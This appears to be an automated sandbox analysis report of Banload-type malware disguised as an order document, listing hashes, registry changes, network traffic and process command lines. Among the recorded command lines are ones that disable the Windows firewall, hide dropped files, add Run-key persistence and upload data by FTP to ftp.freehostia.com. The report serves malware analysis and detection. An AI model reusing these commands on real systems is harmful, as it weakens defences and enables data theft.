memory/1396-129-0x0000000000400000-0x0000000000709000-memory.dmp
memory/1752-127-0x0000000002450000-0x0000000002759000-memory.dmp
memory/1752-126-0x0000000002450000-0x0000000002759000-memory.dmp
memory/2388-136-0x0000000002720000-0x000000000292C000-memory.dmp
memory/2388-132-0x0000000002720000-0x000000000292C000-memory.dmp
memory/2388-143-0x0000000000400000-0x0000000000709000-memory.dmp
memory/2388-144-0x0000000000400000-0x0000000000709000-memory.dmp
memory/2388-145-0x0000000000400000-0x0000000000709000-memory.dmp
memory/2388-147-0x0000000002720000-0x000000000292C000-memory.dmp
memory/2388-146-0x0000000000400000-0x0000000000709000-memory.dmp
memory/2388-150-0x0000000002720000-0x000000000292C000-memory.dmp
memory/2388-158-0x0000000002720000-0x000000000292C000-memory.dmp
memory/1396-160-0x0000000000400000-0x0000000000709000-memory.dmp
memory/2004-168-0x0000000000400000-0x000000000070C000-memory.dmp
memory/1736-171-0x0000000000400000-0x000000000070C000-memory.dmp
memory/2004-170-0x00000000024D0000-0x00000000027DC000-memory.dmp
memory/1752-167-0x0000000002450000-0x000000000275C000-memory.dmp
memory/1752-165-0x0000000002450000-0x000000000275C000-memory.dmp
memory/1736-176-0x00000000028A0000-0x0000000002AAC000-memory.dmp
memory/1736-172-0x00000000028A0000-0x0000000002AAC000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | 4ce4d01ccc41c2e73643c40abe61aa58 |
| SHA1 | 2dcb3b58de4e71a1febd32f789d5fb36de11cadd |
| SHA256 | 09813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced |
| SHA512 | f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef |
C:\ProgramData\TEMP:663565B1
| MD5 | 975b45ee642a705c6964c62423c1265d |
| SHA1 | 36c5cfb74b08a58df3075d85fbf8f2b556bc802b |
| SHA256 | 49166da32916c50516dd2e2748d162aa81050f6f6e62ab64d6ff6aac1f18cea3 |
| SHA512 | 136f500b84737dc8956b47e1975a6367e4eb4d6f0d8cb20ddb3e36420e7472ae026c20471d635976db1a23a83072b001a9e4343383d8606bbe3818373bd8da8a |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | 34313f1b6c9f24f18a7c9504d109c922 |
| SHA1 | 7a7b5586b9cf1c7c9d54adcab16bceaff761fa78 |
| SHA256 | 793d8c85c5cff30809c4e10738a0c8cc48f0d71842776c3955056ebd869efa7e |
| SHA512 | 3d0ec8ffa68aceda742a2220271635090e7535b87e39c1a4d32bac677b77913784713a69c83fd008c3b9840f59a49f3f42de2c2ee98cec4ff2beeb55643c8905 |
memory/1736-189-0x00000000028A0000-0x0000000002AAC000-memory.dmp
memory/1736-187-0x0000000000400000-0x000000000070C000-memory.dmp
memory/1736-186-0x0000000000400000-0x000000000070C000-memory.dmp
memory/1736-185-0x0000000000400000-0x000000000070C000-memory.dmp
memory/1736-192-0x00000000028A0000-0x0000000002AAC000-memory.dmp
memory/1736-188-0x0000000000400000-0x000000000070C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | 9494657198eb9f9e27ddb279cf5d45f6 |
| SHA1 | f0146baf6579d52467bbe5955fc102a4bc4cea82 |
| SHA256 | 248bd5453a848cd3a9d97d1d1a4efe85e636a6c08da1db53b8c05e3c80ff9613 |
| SHA512 | 1fb38c16b196bab47d790b263bad5ff7479c96769012eea2ad3cf9acc5866c9cb3bdb996fe700eee6ac2518a47a81fb8a2e8ce18dd58db10d1495cfcfc02f6f6 |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
memory/2004-199-0x0000000000400000-0x000000000070C000-memory.dmp
memory/1736-197-0x00000000028A0000-0x0000000002AAC000-memory.dmp
memory/1752-206-0x0000000002450000-0x000000000275C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-30 13:19
Reported
2024-08-30 13:21
Platform
win10v2004-20240802-en
Max time kernel
141s
Max time network
128s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0\RuntimeVersion = "v2.0.50727" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Assembly = "Microsoft.Vbe.Interop, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\Class = "Microsoft.Vbe.Interop.VBProjectClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0\Assembly = "Microsoft.Vbe.Interop, Version=15.0.0.0, Culture=neutral, PublicKeyToken=71E9BCE111E9429C" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\15.0.0.0\Class = "Microsoft.Vbe.Interop.VBProjectClass" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160626122950.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2708,i,8231329449558834090,4540802069600791165,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:8
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 8e6e9290ff877feff5541cec9023f670 |
| SHA1 | 64af5a9d7740c1dfc9407fcc14e1e6c5484ceffd |
| SHA256 | 503b2f2582bf2efb3d9cd446648819814037e6c7d88bb178d178048dd42dacc7 |
| SHA512 | 03f85e8efc7d73f3b3eb2e6c45bf6056f4e8a2ccb1a99f83656bca1cb0b3b6a1685846b760f88e90ec9c8ce8c08571742adfd3694b9f3cc1ab002e22117c8193 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 9acfede263e82a5d2c3e433f65a034a9 |
| SHA1 | 8eac20b714691232eebb777fd1b99d456201551a |
| SHA256 | 7705dcf5bc1484a398aab305e71e56ab9683f28b2c8e00c556bdefa21c25b15d |
| SHA512 | 5b61b43bd15fe2d53c9cb48e00d3d340e5866b349b686e1de813b01ec541bc7716105b0267a31c8d3b260cfc0b4d2e8896acdaba83b6bf7b5bfe11673a2bf3f1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 9091783550da66165530d1c5c90c1043 |
| SHA1 | 5e1831a2fd9eaf331dec4895016ab5c1ebbd9443 |
| SHA256 | 2bd538ee374c558e75d3e10f2051c42bde134ee7fe9539980ad7ab1147f9083e |
| SHA512 | c0d6e54f6a4e8e2e9213ffe38582b86eb7abc83047d4f64b03c75aaadcc289a9bbc1ec1c0d3d10751053f6096039b2206c6e385465903695a68f0ae6fc6a55d4 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
memory/4032-53-0x0000000000400000-0x0000000000709000-memory.dmp
memory/904-58-0x0000000000400000-0x0000000000709000-memory.dmp
memory/904-59-0x0000000002AD0000-0x0000000002CDC000-memory.dmp
